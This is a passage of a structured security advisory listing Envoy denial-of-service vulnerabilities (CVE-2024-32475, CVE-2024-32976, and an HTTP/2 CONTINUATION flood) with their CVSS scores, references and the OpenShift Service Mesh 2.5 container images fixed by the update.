"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", }, { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", 